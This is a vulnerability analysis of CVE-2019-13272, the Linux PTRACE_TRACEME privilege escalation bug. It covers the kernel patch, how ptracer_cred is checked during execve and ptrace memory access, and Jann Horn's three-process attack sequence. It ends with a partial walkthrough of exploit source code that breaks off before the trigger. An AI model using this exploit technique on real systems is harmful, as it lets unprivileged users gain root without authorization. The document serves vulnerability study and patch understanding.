PTRACE_TRACEME CVE-2019-13272 Local Privilege Escalation Vulnerability Analysis


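The PTRACE_TRACEME vulnerability is a kernel privilege escalation bug discovered by Jann Horn in July 2019. Both the way it was found and the way it is exploited are instructive, and this article records my own study of it.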

author: Gengjia Chen of IceSwordLab, Qihoo 360

The patch

We start the analysis from the patch, ptrace: Fix ->ptracer_cred handling for PTRACE_TRACEME

Fix two issues:

// Issue 1: the RCU reference to the cred
When called for PTRACE_TRACEME, ptrace_link() would obtain an RCU   
reference to the parent's objective credentials, then give that pointer
to get_cred().  However, the object lifetime rules for things like
struct cred do not permit unconditionally turning an RCU reference into
a stable reference.

// Issue 2: which cred the tracee records as the tracer's cred
PTRACE_TRACEME records the parent's credentials as if the parent was 
acting as the subject, but that's not the case.  If a malicious
unprivileged child uses PTRACE_TRACEME and the parent is privileged, and
at a later point, the parent process becomes attacker-controlled
(because it drops privileges and calls execve()), the attacker ends up
with control over two processes with a privileged ptrace relationship,
which can be abused to ptrace a suid binary and obtain root privileges.


Fix both of these by always recording the credentials of the process
that is requesting the creation of the ptrace relationship:
current_cred() can't change under us, and current is the proper subject
for access control.

That was the patch description. The patch code follows.

diff --git a/kernel/ptrace.c b/kernel/ptrace.c
index 8456b6e..705887f 100644
--- a/kernel/ptrace.c
+++ b/kernel/ptrace.c
@@ -79,9 +79,7 @@ void __ptrace_link(struct task_struct *child, struct task_struct *new_parent,
  */
 static void ptrace_link(struct task_struct *child, struct task_struct *new_parent)
 {
-    rcu_read_lock();
-    __ptrace_link(child, new_parent, __task_cred(new_parent));
-    rcu_read_unlock();
+    __ptrace_link(child, new_parent, current_cred());
 }

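According to the description, the patch fixes two issues:

1. The RCU reference issue, which the code fixes by removing the RCU lock.
2. The issue caused by the tracee recording the tracer process's cred.

This article ignores the first issue and analyzes only the second, which can be used for local privilege escalation.

The description of the second issue is fairly involved, so we come back to it later. The corresponding code change, on the other hand, is very simple:

'__task_cred(new_parent)' is replaced with 'current_cred()', which means the recorded cred changes from the tracer process's cred to the current process's cred.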
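The effect of that one-line change can be sketched with a small user-space model. This is only an illustration under simplifying assumptions: `struct cred_model`, `struct task_model`, `link_before_fix` and `link_after_fix` are hypothetical names, not kernel APIs, and a cred is reduced to a uid/euid pair copied by value.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical, heavily simplified stand-ins for struct cred and task_struct. */
struct cred_model {
    unsigned int uid;
    unsigned int euid;
};

struct task_model {
    struct cred_model cred;          /* the task's own credentials */
    struct task_model *parent;       /* the tracer once a link exists */
    struct cred_model ptracer_cred;  /* copy of the cred recorded at link time */
};

/* Before the fix: always record the credentials of new_parent (the tracer). */
static void link_before_fix(struct task_model *child,
                            struct task_model *new_parent)
{
    assert(child != NULL && new_parent != NULL);
    child->parent = new_parent;
    child->ptracer_cred = new_parent->cred;
}

/*
 * After the fix: record the credentials of the task that requested the link.
 * For an attach request that is the tracer, for PTRACE_TRACEME it is the
 * tracee itself.
 */
static void link_after_fix(struct task_model *child,
                           struct task_model *new_parent,
                           const struct task_model *requester)
{
    assert(child != NULL && new_parent != NULL && requester != NULL);
    child->parent = new_parent;
    child->ptracer_cred = requester->cred;
}
```

In this model, an unprivileged child that links itself to a parent with euid 0 ends up with a root `ptracer_cred` before the fix and with its own unprivileged cred after it, while an attach-style link (requester equals tracer) records the same cred either way.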

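Vulnerability analysis

ptrace is a system call that lets one process (the tracer) observe and control the execution of another process (the tracee), and inspect and modify its memory image and registers. It is mainly used to implement breakpoint debugging and system call tracing.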

   1    396  kernel/ptrace.c <<ptrace_attach>>
             ptrace_link(task, current);  // links the target task to be traced, 'task',
                      //  with the current task that initiates the trace, 'current'
   2    469  kernel/ptrace.c <<ptrace_traceme>>
             ptrace_link(current, current->real_parent);  // links the current task that initiates
                              // the trace, 'current', with its
                              // parent, 'current->real_parent'

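A trace relationship can be established in two ways:

1. A process calls fork and the child then calls PTRACE_TRACEME on its own initiative. This is initiated by the tracee and handled by the kernel function ptrace_traceme.
2. A process calls PTRACE_ATTACH or PTRACE_SEIZE to trace another process. This is initiated by the tracer and handled by the kernel function ptrace_attach.

Either way, ptrace_link is eventually called to establish the trace relationship between tracer and tracee.

ptrace_attach links 'task' (tracee) and 'current' (tracer)
ptrace_traceme links 'current' (tracee) and 'current->real_parent' (tracer)

Keep in mind exactly which task is the tracer and which is the tracee in each of these two modes, because this is the key to the vulnerability.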

static void ptrace_link(struct task_struct *child, struct task_struct *new_parent)
{
        rcu_read_lock();
        __ptrace_link(child, new_parent, __task_cred(new_parent));
        rcu_read_unlock();
}

void __ptrace_link(struct task_struct *child, struct task_struct *new_parent,
                   const struct cred *ptracer_cred)
{
        BUG_ON(!list_empty(&child->ptrace_entry));
        list_add(&child->ptrace_entry, &new_parent->ptraced); // 1. add the child to the parent's ptraced list
        child->parent = new_parent; // 2. store the parent's address in the parent pointer
        child->ptracer_cred = get_cred(ptracer_cred); // 3. save ptracer_cred; this is the only field we care about
}

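The key step in establishing a trace relationship is that the tracee records the tracer's cred in its own 'ptracer_cred' field; the name is self-explanatory.

The ptracer_cred concept was introduced by a 2016 patch, ptrace: Capture the ptracer's creds not PT_PTRACE_CAP. Its purpose is to support a security check when the tracee calls exec to load a setuid executable.

Why is this security check needed?

The exec family of functions replaces the process image. If the setuid bit of the executed file is set, running it changes the process's euid to the uid of the file's owner. If the owner has more privilege than the process calling exec, running such a setuid executable escalates privileges.

Suppose the process calling exec is itself a tracee. After it has gained privileges by executing a setuid executable, the tracer can still modify the tracee's registers and memory at any time, so a low-privileged tracer could drive the tracee into performing operations beyond the tracer's own privileges.

The kernel obviously cannot allow this. So when the trace relationship is established, the tracee saves the tracer's cred (ptracer_cred). During exec, if the file being executed has the setuid bit set, the kernel checks the privileges of 'ptracer_cred'. If they are insufficient, the setuid escalation is not applied and the setuid executable runs with the process's original privileges.

The code for this process is analyzed below (all code analysis in this article is based on v4.19-rc8).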

do_execve
  -> __do_execve_file
  -> prepare_binprm 
      -> bprm_fill_uid
      -> security_bprm_set_creds
          ->cap_bprm_set_creds
          -> ptracer_capable
          ->selinux_bprm_set_creds
          ->(apparmor_bprm_set_creds)
          ->(smack_bprm_set_creds)
          ->(tomoyo_bprm_set_creds)

As shown above, the privilege-related work in execve is mainly done in the function 'prepare_binprm'.

1567 int prepare_binprm(struct linux_binprm *bprm)
    1568 {
    1569         int retval;
    1570         loff_t pos = 0;
    1571 
    1572         bprm_fill_uid(bprm); // <-- initial fill of the new process's cred
    1573 
    1574         /* fill in binprm security blob */
    1575         retval = security_bprm_set_creds(bprm); // <-- security checks,
                             // which may modify the new process's cred
    1576         if (retval)
    1577                 return retval;
    1578         bprm->called_set_creds = 1;
    1579 
    1580         memset(bprm->buf, 0, BINPRM_BUF_SIZE);
    1581         return kernel_read(bprm->file, bprm->buf, BINPRM_BUF_SIZE, &pos);
    1582 }

As shown above, 'bprm_fill_uid' is called first to fill in the new process's cred, and then 'security_bprm_set_creds' runs the security checks and may modify the new cred.

1509 static void bprm_fill_uid(struct linux_binprm *bprm)
    1510 {
    1511         struct inode *inode;
    1512         unsigned int mode;
    1513         kuid_t uid;
    1514         kgid_t gid;
    1515 
    1516         /*
    1517          * Since this can be called multiple times (via prepare_binprm),
    1518          * we must clear any previous work done when setting set[ug]id
    1519          * bits from any earlier bprm->file uses (for example when run
    1520          * first for a setuid script then again for its interpreter).
    1521          */
    1522         bprm->cred->euid = current_euid(); // <--- start with the current process's euid
    1523         bprm->cred->egid = current_egid();
    1524 
    1525         if (!mnt_may_suid(bprm->file->f_path.mnt))
    1526                 return;
    1527 
    1528         if (task_no_new_privs(current))
    1529                 return;
    1530 
    1531         inode = bprm->file->f_path.dentry->d_inode;
    1532         mode = READ_ONCE(inode->i_mode);
    1533         if (!(mode & (S_ISUID|S_ISGID))) // <---------- if the executable has no setuid/setgid bit, return here
    1534                 return;
    1535 
    1536         /* Be careful if suid/sgid is set */
    1537         inode_lock(inode);
    1538 
    1539         /* reload atomically mode/uid/gid now that lock held */
    1540         mode = inode->i_mode;
    1541         uid = inode->i_uid; // <---- read the file's i_uid (used below if S_ISUID is set)
    1542         gid = inode->i_gid;
    1543         inode_unlock(inode);
    1544 
    1545         /* We ignore suid/sgid if there are no mappings for them in the ns */
    1546         if (!kuid_has_mapping(bprm->cred->user_ns, uid) ||
    1547                  !kgid_has_mapping(bprm->cred->user_ns, gid))
    1548                 return;
    1549 
    1550         if (mode & S_ISUID) {
    1551                 bprm->per_clear |= PER_CLEAR_ON_SETID;
    1552                 bprm->cred->euid = uid; // <------ use the file's i_uid as the new process's euid
    1553         }
    1554 
    1555         if ((mode & (S_ISGID | S_IXGRP)) == (S_ISGID | S_IXGRP)) {
    1556                 bprm->per_clear |= PER_CLEAR_ON_SETID;
    1557                 bprm->cred->egid = gid;
    1558         }
    1559 }

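Two lines matter here:

Line 1522 assigns the current euid to the new euid, so most processes keep their privileges across execve.
Line 1552: if the file has the suid bit, the uid of the executable's owner is assigned to the new euid. This is the implementation of setuid: the new euid becomes the uid of the owner of the executed file, and if the owner is a privileged user, privileges are escalated here.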
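The euid decision made on those two lines can be modeled in user space roughly as follows. This is a sketch, not kernel code: `model_fill_euid` and its parameters are hypothetical, the setgid handling and the user-namespace mapping check are left out, and the two boolean flags stand in for the `mnt_may_suid()` and `task_no_new_privs()` early returns.

```c
#include <assert.h>
#include <stdbool.h>
#include <sys/stat.h>   /* S_ISUID */
#include <sys/types.h>  /* uid_t, mode_t */

/*
 * Hypothetical model of the euid part of bprm_fill_uid().
 * Returns the euid proposed for the new program image.
 */
static uid_t model_fill_euid(uid_t current_euid, mode_t file_mode,
                             uid_t file_owner, bool nosuid_mount,
                             bool no_new_privs)
{
    uid_t euid = current_euid;      /* line 1522: start from the caller's euid */

    /* Models the early returns for nosuid mounts and no_new_privs tasks. */
    if (nosuid_mount || no_new_privs)
        return euid;

    if (file_mode & S_ISUID)
        euid = file_owner;          /* line 1552: take the file owner's uid */

    return euid;
}
```

For a root-owned file, mode `0104755` (setuid set) yields euid 0 for an unprivileged caller, while mode `0100755` leaves the caller's euid unchanged.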

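However, this euid is still not final. It has to pass further security checks in security_bprm_set_creds.

security_bprm_set_creds calls into the LSM framework.

In the kernel version I analyzed, five security modules implement the 'bprm_set_creds' hook. The check functions are: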

cap_bprm_set_creds
selinux_bprm_set_creds
apparmor_bprm_set_creds
smack_bprm_set_creds
tomoyo_bprm_set_creds

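Which of these hook functions actually run depends on the kernel configuration. In principle, if every LSM is enabled, all of the functions above that implement the 'bprm_set_creds' hook are executed.

In my analysis environment only cap_bprm_set_creds and selinux_bprm_set_creds actually run.

Of these, the one that affects the euid is 'cap_bprm_set_creds'.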

815 int cap_bprm_set_creds(struct linux_binprm *bprm)
    816 {
    817         const struct cred *old = current_cred();
    818         struct cred *new = bprm->cred;
    819         bool effective = false, has_fcap = false, is_setid;
    820         int ret;
    821         kuid_t root_uid;
    ===================== skip ======================
    838         /* Don't let someone trace a set[ug]id/setpcap binary with the revised
    839          * credentials unless they have the appropriate permit.
    840          *
    841          * In addition, if NO_NEW_PRIVS, then ensure we get no new privs.
    842          */
    843         is_setid = __is_setuid(new, old) || __is_setgid(new, old);  
    844 
    845         if ((is_setid || __cap_gained(permitted, new, old)) && // <---- checks whether a setid program is being executed
    846             ((bprm->unsafe & ~LSM_UNSAFE_PTRACE) || 
    847              !ptracer_capable(current, new->user_ns))) { // <----- if the process calling execve is traced and the program is setuid, an extra privilege check is needed
    848                 /* downgrade; they get no more than they had, and maybe less */
    849                 if (!ns_capable(new->user_ns, CAP_SETUID) ||
    850                     (bprm->unsafe & LSM_UNSAFE_NO_NEW_PRIVS)) {
    851                         new->euid = new->uid; // <----- if the check fails, the new process's euid is reset to the original process's uid
    852                         new->egid = new->gid;
    853                 }
    854                 new->cap_permitted = cap_intersect(new->cap_permitted,
    855                                                    old->cap_permitted);
    856         }
    857 
    858         new->suid = new->fsuid = new->euid;
    859         new->sgid = new->fsgid = new->egid;
    ===================== skip ======================
}

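As shown above:

Line 845 checks whether the euid differs from the original uid (from the analysis of bprm_fill_uid we know that they differ if the executed file has the setuid bit), so this is equivalent to checking whether the executable is a setid program.
Line 847 calls ptracer_capable, which only imposes a restriction when this process is a tracee.

If the program is setid and the ptracer_capable check fails, the downgrade branch is taken.

Line 851 sets new->euid back to new->uid, which means the privilege gained in bprm_fill_uid may be taken away again here.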
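The downgrade logic around lines 845 to 851 can be sketched as a pure function. The names below (`struct exec_input`, `model_final_euid`) are hypothetical, and the model covers only the setuid case: setgid, gained capabilities and the `cap_permitted` intersection are ignored.

```c
#include <assert.h>
#include <stdbool.h>
#include <sys/types.h>  /* uid_t */

/* Hypothetical inputs to a simplified cap_bprm_set_creds() euid decision. */
struct exec_input {
    uid_t uid;            /* real uid of the task calling execve() */
    uid_t new_euid;       /* euid proposed by bprm_fill_uid() */
    bool other_unsafe;    /* any bprm->unsafe bit other than LSM_UNSAFE_PTRACE */
    bool tracer_capable;  /* result of ptracer_capable(); true if untraced */
    bool has_cap_setuid;  /* result of ns_capable(..., CAP_SETUID) */
    bool no_new_privs;    /* LSM_UNSAFE_NO_NEW_PRIVS is set */
};

static uid_t model_final_euid(const struct exec_input *in)
{
    /* Mirrors __is_setuid(new, old): the new euid differs from the old uid. */
    bool is_setid = in->new_euid != in->uid;
    bool unsafe = in->other_unsafe || in->no_new_privs || !in->tracer_capable;

    if (is_setid && unsafe) {
        /* Downgrade: without CAP_SETUID the setuid escalation is undone. */
        if (!in->has_cap_setuid || in->no_new_privs)
            return in->uid;         /* line 851: new->euid = new->uid */
    }
    return in->new_euid;
}
```

With `uid = 1000` and `new_euid = 0`, the model returns 1000 when `tracer_capable` is false and 0 when it is true, which is the difference the rest of the analysis relies on.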

499 bool ptracer_capable(struct task_struct *tsk, struct user_namespace *ns)
    500 {
    501         int ret = 0;  /* An absent tracer adds no restrictions */
    502         const struct cred *cred;
    503         rcu_read_lock();
    504         cred = rcu_dereference(tsk->ptracer_cred); // <----- fetch the ptracer_cred saved by ptrace_link
    505         if (cred)
    506                 ret = security_capable_noaudit(cred, ns, CAP_SYS_PTRACE); // <-------- enter the LSM framework for the security check
    507         rcu_read_unlock();
    508         return (ret == 0);
    509 }

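As shown above:

Line 504 fetches 'tsk->ptracer_cred'.
Line 506 enters the LSM framework to check 'tsk->ptracer_cred'.

Here the variable at the heart of this vulnerability, 'tsk->ptracer_cred', finally appears. As described earlier, it is the tracer's cred as saved by the tracee when the trace relationship was established.

When the tracee later calls execve on a suid executable, ptracer_capable is called and the LSM framework judges the privileges of 'ptracer_cred'.

We do not analyze the capable hook of the LSM framework here. In short, if the tracer itself has root privileges the check passes; otherwise it fails.

As analyzed above, if ptracer_capable fails, the privilege in new->euid is taken back.

For example, suppose A ptraces B and B calls execve on '/usr/bin/passwd'. According to the code above, if A is root then B runs passwd with euid root; otherwise B keeps its original privileges.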
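The A/B example can be written down as a tiny model of ptracer_capable. Everything here is an assumption made for illustration: `struct ptracer_cred_model` reduces a cred to a single "has CAP_SYS_PTRACE" flag, and `model_euid_after_suid_exec` assumes a root-owned setuid binary, a task without CAP_SETUID, and no other unsafe conditions.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical reduction of the recorded tracer cred to one capability flag. */
struct ptracer_cred_model {
    bool has_cap_sys_ptrace;
};

/* Models ptracer_capable(): NULL means "no tracer recorded". */
static bool model_ptracer_capable(const struct ptracer_cred_model *ptracer_cred)
{
    if (ptracer_cred == NULL)
        return true;                /* an absent tracer adds no restrictions */
    return ptracer_cred->has_cap_sys_ptrace;
}

/*
 * euid that task B (real uid `uid`) gets after execve() of a root-owned
 * setuid binary such as /usr/bin/passwd, under the assumptions stated above.
 */
static unsigned int model_euid_after_suid_exec(
    unsigned int uid, const struct ptracer_cred_model *ptracer_cred)
{
    return model_ptracer_capable(ptracer_cred) ? 0u : uid;
}
```

In this model B keeps uid 1000 when the recorded cred lacks the capability, and becomes euid 0 both when it is untraced and when the recorded cred is privileged.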

kernel/ptrace.c <<ptrace_traceme>>
             ptrace_link(current, current->real_parent);  

static void ptrace_link(struct task_struct *child, struct task_struct *new_parent)
{
        rcu_read_lock();
        __ptrace_link(child, new_parent, __task_cred(new_parent));
        rcu_read_unlock();
}

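Back to the vulnerable code: why is it wrong for traceme to record the parent's cred when establishing the trace link? Isn't the parent the tracer at that moment?

We use Jann Horn's example to show why the tracer's cred must not be used when the trace link is established through traceme.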

- 1, task A: fork()s a child, task B
 - 2, task B: fork()s a child, task C
 - 3, task B: execve(/some/special/suid/binary)
 - 4, task C: PTRACE_TRACEME (creates privileged ptrace relationship)
 - 5, task C: execve(/usr/bin/passwd)
 - 6, task B: drop privileges (setresuid(getuid(), getuid(), getuid()))
 - 7, task B: become dumpable again (e.g. execve(/some/other/binary))
 - 8, task A: PTRACE_ATTACH to task B
 - 9, task A: use ptrace to take control of task B
 - 10, task B: use ptrace to take control of task C

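The scenario above involves three processes: A, B and C.

Step 4: when task C uses PTRACE_TRACEME to establish the trace link with B, B has euid = 0 (because it has just executed a suid binary), so the ptracer_cred recorded by C also has euid 0.
Step 5: task C then calls execve(suid binary). By the analysis above, C's ptracer_cred is privileged, so ptracer_capable passes and after execve task C's euid is also raised to 0. Note that the trace link between B and C is still in place.
Step 6: task B calls setresuid to drop its privileges, so that task A is able to attach to it.
Step 8: task A uses PTRACE_ATTACH to establish a trace link with B. A and B both have ordinary privileges, and from then on A can make B do anything (step 9).
Step 10: task B controls task C to perform privileged operations.

By the code analysis so far, the first nine steps all work. Does step 10 work as well?

At step 10, task B has ordinary privileges, task C has euid root, and the trace link between B and C is valid. Under these conditions, can B send ptrace requests to make C do arbitrary things, including privileged operations?

We answer this question by looking at the code.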

1111 SYSCALL_DEFINE4(ptrace, long, request, long, pid, unsigned long, addr,
    1112                 unsigned long, data)
    1113 {
    1114         struct task_struct *child;
    1115         long ret;
    1116 
    1117         if (request == PTRACE_TRACEME) {
    1118                 ret = ptrace_traceme(); // <----- the traceme branch
    1119                 if (!ret)
    1120                         arch_ptrace_attach(current);
    1121                 goto out;
    1122         }
    1123 
    1124         child = find_get_task_by_vpid(pid);
    1125         if (!child) {
    1126                 ret = -ESRCH;
    1127                 goto out;
    1128         }
    1129 
    1130         if (request == PTRACE_ATTACH || request == PTRACE_SEIZE) {
    1131                 ret = ptrace_attach(child, request, addr, data); // <------ the attach branch
    1132                 /*
    1133                  * Some architectures need to do book-keeping after
    1134                  * a ptrace attach.
    1135                  */
    1136                 if (!ret)
    1137                         arch_ptrace_attach(child);
    1138                 goto out_put_task_struct;
    1139         }
    1140 
    1141         ret = ptrace_check_attach(child, request == PTRACE_KILL ||
    1142                                   request == PTRACE_INTERRUPT);
    1143         if (ret < 0)
    1144                 goto out_put_task_struct;
    1145 
    1146         ret = arch_ptrace(child, request, addr, data); // <---- all other ptrace requests
    1147         if (ret || request != PTRACE_DETACH)
    1148                 ptrace_unfreeze_traced(child);
    1149 
    1150  out_put_task_struct:
    1151         put_task_struct(child);
    1152  out:
    1153         return ret;
    1154 }

As shown above, since a trace link already exists between task B and task C, B can send ptrace requests to C directly, and they go into the function arch_ptrace.

arch/x86/kernel/ptrace.c

arch_ptrace 
    -> ptrace_request 
        -> generic_ptrace_peekdata
           generic_ptrace_pokedata 
            -> ptrace_access_vm 
                -> ptracer_capable 

 kernel/ptrace.c
 884 int ptrace_request(struct task_struct *child, long request,
 885                    unsigned long addr, unsigned long data)
 886 {
 887         bool seized = child->ptrace & PT_SEIZED;
 888         int ret = -EIO;
 889         siginfo_t siginfo, *si;
 890         void __user *datavp = (void __user *) data;
 891         unsigned long __user *datalp = datavp;
 892         unsigned long flags;
 893 
 894         switch (request) {
 895         case PTRACE_PEEKTEXT:
 896         case PTRACE_PEEKDATA:
 897                 return generic_ptrace_peekdata(child, addr, data);
 898         case PTRACE_POKETEXT:
 899         case PTRACE_POKEDATA:
 900                 return generic_ptrace_pokedata(child, addr, data);
 901 
 =================== skip ================
 1105 }


 1156 int generic_ptrace_peekdata(struct task_struct *tsk, unsigned long addr,
 1157                             unsigned long data)
 1158 {
 1159         unsigned long tmp;
 1160         int copied;
 1161 
 1162         copied = ptrace_access_vm(tsk, addr, &tmp, sizeof(tmp), FOLL_FORCE); // <--- calls ptrace_access_vm
 1163         if (copied != sizeof(tmp))
 1164                 return -EIO;
 1165         return put_user(tmp, (unsigned long __user *)data);
 1166 }
 1167 
 1168 int generic_ptrace_pokedata(struct task_struct *tsk, unsigned long addr,
 1169                             unsigned long data)
 1170 {
 1171         int copied;
 1172 
 1173         copied = ptrace_access_vm(tsk, addr, &data, sizeof(data), // <---- calls ptrace_access_vm
 1174                         FOLL_FORCE | FOLL_WRITE);
 1175         return (copied == sizeof(data)) ? 0 : -EIO;
 1176 }

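As shown above, when the tracer wants to make the tracee run new code, it has to send requests that read and write the tracee's code and data memory. The corresponding requests are PTRACE_PEEKTEXT / PTRACE_PEEKDATA / PTRACE_POKETEXT / PTRACE_POKEDATA.

All of these reads and writes are ultimately implemented by ptrace_access_vm.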

kernel/ptrace.c
    38 int ptrace_access_vm(struct task_struct *tsk, unsigned long addr,
    39                      void *buf, int len, unsigned int gup_flags)
    40 {
    41         struct mm_struct *mm;
    42         int ret;
    43 
    44         mm = get_task_mm(tsk);
    45         if (!mm)
    46                 return 0;
    47 
    48         if (!tsk->ptrace ||
    49             (current != tsk->parent) ||
    50             ((get_dumpable(mm) != SUID_DUMP_USER) &&
    51              !ptracer_capable(tsk, mm->user_ns))) { // < ----- ptracer_capable is called again
    52                 mmput(mm);
    53                 return 0;
    54         }
    55 
    56         ret = __access_remote_vm(tsk, mm, addr, buf, len, gup_flags);
    57         mmput(mm);
    58 
    59         return ret;
    60 }

    kernel/capability.c
    499 bool ptracer_capable(struct task_struct *tsk, struct user_namespace *ns)
    500 {
    501         int ret = 0;  /* An absent tracer adds no restrictions */
    502         const struct cred *cred;
    503         rcu_read_lock();
    504         cred = rcu_dereference(tsk->ptracer_cred);
    505         if (cred)
    506                 ret = security_capable_noaudit(cred, ns, CAP_SYS_PTRACE);
    507         rcu_read_unlock();
    508         return (ret == 0);
    509 }

As shown above, ptrace_access_vm calls the 'ptracer_capable' function analyzed earlier to decide whether the request may proceed. This is the second place where 'ptracer_capable' is used.
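The three-part condition in ptrace_access_vm can be restated as a small predicate. This is a user-space sketch with hypothetical names (`struct tracee_model`, `model_access_allowed`); tasks are identified by plain integers, and the result of ptracer_capable is passed in as a flag rather than computed.

```c
#include <assert.h>
#include <stdbool.h>

/* Same numeric values as the kernel's SUID_DUMP_DISABLE and SUID_DUMP_USER. */
enum { MODEL_SUID_DUMP_DISABLE = 0, MODEL_SUID_DUMP_USER = 1 };

/* Hypothetical view of the tracee fields that ptrace_access_vm() consults. */
struct tracee_model {
    bool traced;           /* tsk->ptrace != 0 */
    int tracer_id;         /* identifies tsk->parent */
    int dumpable;          /* get_dumpable(mm) */
    bool ptracer_capable;  /* result of ptracer_capable(tsk, mm->user_ns) */
};

/* Returns true when the memory access would be allowed to proceed. */
static bool model_access_allowed(const struct tracee_model *tsk, int current_id)
{
    if (!tsk->traced)
        return false;                       /* no trace link at all */
    if (current_id != tsk->tracer_id)
        return false;                       /* caller is not the tracer */
    if (tsk->dumpable != MODEL_SUID_DUMP_USER && !tsk->ptracer_capable)
        return false;                       /* non-dumpable and unprivileged link */
    return true;
}
```

A tracee that has just executed a setuid binary is typically not `SUID_DUMP_USER`, so in this model access hinges entirely on the `ptracer_capable` flag, that is, on the cred recorded at link time.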

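From the earlier analysis, the ptracer_cred saved by task C at this point is a privileged cred, so ptracer_capable passes. That answers the question above: in this situation, task B with ordinary privileges can send ptrace requests that read and write the code and data memory of task C, which runs as root.

So the privileged ptracer_cred recorded by task C serves two purposes:

1, it lets task C escalate its own privileges through execve(suid binary)
2, it lets task B, with ordinary privileges, use ptrace to read and write task C's code and data memory and thereby make task C do anything

Put together, these two points are a complete privilege escalation.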

Summary

Only after working through the code analysis above does this paragraph of the patch description become clear:

PTRACE_TRACEME records the parent's credentials as if the parent was 
acting as the subject, but that's not the case.  If a malicious
unprivileged child uses PTRACE_TRACEME and the parent is privileged, and
at a later point, the parent process becomes attacker-controlled
(because it drops privileges and calls execve()), the attacker ends up
with control over two processes with a privileged ptrace relationship,
which can be abused to ptrace a suid binary and obtain root privileges.

In essence this vulnerability resembles a TOCTOU bug: ptracer_cred is captured at traceme time but used later, during the subsequent ptrace requests, and by then the tracer's cred may no longer be the cred it had when the trace link was established.
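The time-of-check versus time-of-use gap can be made concrete with a toy timeline. The sketch below is a deliberately crude model: all names are hypothetical, a cred is just an euid, and "privileged" simply means euid 0.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical one-field credential. */
struct cred_snap {
    unsigned int euid;
};

struct traced_task {
    struct cred_snap cred;          /* current credentials, may change later */
    struct cred_snap ptracer_cred;  /* copy taken when the trace link is made */
    bool linked;
};

/* Vulnerable PTRACE_TRACEME: snapshot the parent's credentials at link time. */
static void model_traceme_vulnerable(struct traced_task *child,
                                     const struct traced_task *parent)
{
    child->ptracer_cred = parent->cred;
    child->linked = true;
}

/* A later privilege drop in the parent, like setresuid(uid, uid, uid). */
static void model_drop_privs(struct traced_task *task, unsigned int uid)
{
    task->cred.euid = uid;
}

/* Later checks consult the stale snapshot, not the tracer's current cred. */
static bool model_link_is_privileged(const struct traced_task *child)
{
    return child->linked && child->ptracer_cred.euid == 0;
}
```

After `model_traceme_vulnerable(&c, &b)` with `b` at euid 0, calling `model_drop_privs(&b, 1000)` changes `b` but leaves `model_link_is_privileged(&c)` true, which is the stale state the exploit depends on.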

diff --git a/kernel/ptrace.c b/kernel/ptrace.c
index 8456b6e..705887f 100644
--- a/kernel/ptrace.c
+++ b/kernel/ptrace.c
@@ -79,9 +79,7 @@ void __ptrace_link(struct task_struct *child, struct task_struct *new_parent,
  */
 static void ptrace_link(struct task_struct *child, struct task_struct *new_parent)
 {
-    rcu_read_lock();
-    __ptrace_link(child, new_parent, __task_cred(new_parent));
-    rcu_read_unlock();
+    __ptrace_link(child, new_parent, current_cred());
 }

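Let us look at Jann Horn's patch once more: '__task_cred(new_parent)' -> 'current_cred()'

The patch says that in the PTRACE_TRACEME case ptracer_cred should record not the parent's cred but the calling process's own cred.

So, judging by how this field is used, what it really records is not the tracer's cred but the cred of the 'trace link creator'.

I would suggest that Jann Horn rename the field to ptracelinkcreater_cred: when the trace link is created by PTRACE_ATTACH it equals the tracer's cred, and when the link is created by PTRACE_TRACEME it equals the tracee's cred. What it actually records is the privilege of whoever established the trace relationship.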

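exploit

The key to exploiting this vulnerability is finding a suitable executable to launch as task B. It must satisfy the following conditions:

1, it can be invoked by an unprivileged user
2, it runs as root at some stage of its execution
3, it drops privileges after that

(The brief escalation to root lets task C capture a root ptracer_cred, and the later drop lets B be ptrace-attached by an unprivileged process.)

Here are three exploits:

Jann Horn's exploit uses the pkexec program shipped with desktop distributions to launch task B.

pkexec, part of the polkit authorization framework, lets an authorized user run another executable as a different user. With the --user option it happens to make the process first become root and then drop to the specified user, so it can be used to build process B. In addition, an executable run through the polkit framework is needed (Jann Horn calls these helpers). A helper must be runnable through pkexec by an ordinary user without authentication (many programs run through polkit pop up an authentication dialog). The invocation looks like this:

/usr/bin/pkexec --user nonrootuser /usr/sbin/some-helper-binary

bcoles's exploit builds on Jann Horn's and adds code that searches for more helper binaries. Jann Horn's helper is a hard-coded program that does not exist on many distributions, so his exploit fails on them; bcoles's exploit runs successfully on more distributions.

For learning purposes I also wrote my own version, jiayy's exploit. Helper binaries differ between distributions and pkexec exists only on desktop distributions, yet the bug is in the Linux kernel itself. So I changed Jann Horn's exploit to use a fakepkexec program for the escalation, and the fakepkexec and fakehelper programs are built by hand rather than searched for on the target system. That way anyone studying the bug can run my exploit on any Linux system that has this vulnerability, with no desktop required.

exploit analysis

A quick walk through the exploit code: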

167 int main(int argc, char **argv) {
168   if (strcmp(argv[0], "stage2") == 0)
169     return middle_stage2();
170   if (strcmp(argv[0], "stage3") == 0)
171     return spawn_shell();
172 
173   helper_path = "/tmp/fakehelper";
174 
175   /*
176    * set up a pipe such that the next write to it will block: packet mode,
177    * limited to one packet
178    */
179   SAFE(pipe2(block_pipe, O_CLOEXEC|O_DIRECT));
180   SAFE(fcntl(block_pipe[0], F_SETPIPE_SZ, 0x1000));
181   char dummy = 0;
182   SAFE(write(block_pipe[1], &dummy, 1));
183 
184   /* spawn pkexec in a child, and continue here once our child is in execve() */
185   static char middle_stack[1024*1024];
186   pid_t midpid = SAFE(clone(middle_main, middle_stack+sizeof(middle_stack),
187                             CLONE_VM|CLONE_VFORK|SIGCHLD, NULL));
188   if (!middle_success) return 1;
189 
======================= skip =======================
215 }

Look at line 186 first: clone creates a child process (task B), which runs middle_main.

64 static int middle_main(void *dummy) {
 65   prctl(PR_SET_PDEATHSIG, SIGKILL);
 66   pid_t middle = getpid();
 67 
 68   self_fd = SAFE(open("/proc/self/exe", O_RDONLY));
 69 
 70   pid_t child = SAFE(fork());
 71   if (child == 0) {
 72     prctl(PR_SET_PDEATHSIG, SIGKILL);
 73 
 74     SAFE(dup2(self_fd, 42));
 75 
 76     /* spin until our parent becomes privileged (have to be fast here) */
 77     int proc_fd = SAFE(open(tprintf("/proc/%d/status", middle), O_RDONLY));
 78     char *needle = tprintf("\nUid:\t%d\t0\t", getuid());
 79     while (1) {
 80       char buf[1000];
 81       ssize_t buflen = SAFE(pread(proc_fd, buf, sizeof(buf)-1, 0));
 82       buf[buflen] = '\0';
 83       if (strstr(buf, needle)) break;
 84     }
 85 
 86     /*
 87      * this is where the bug is triggered.
 88      * while our parent is in the middle of pkexec, we force it to become our
 89      * tracer, with pkexec's creds as ptracer_cred.
 90      */
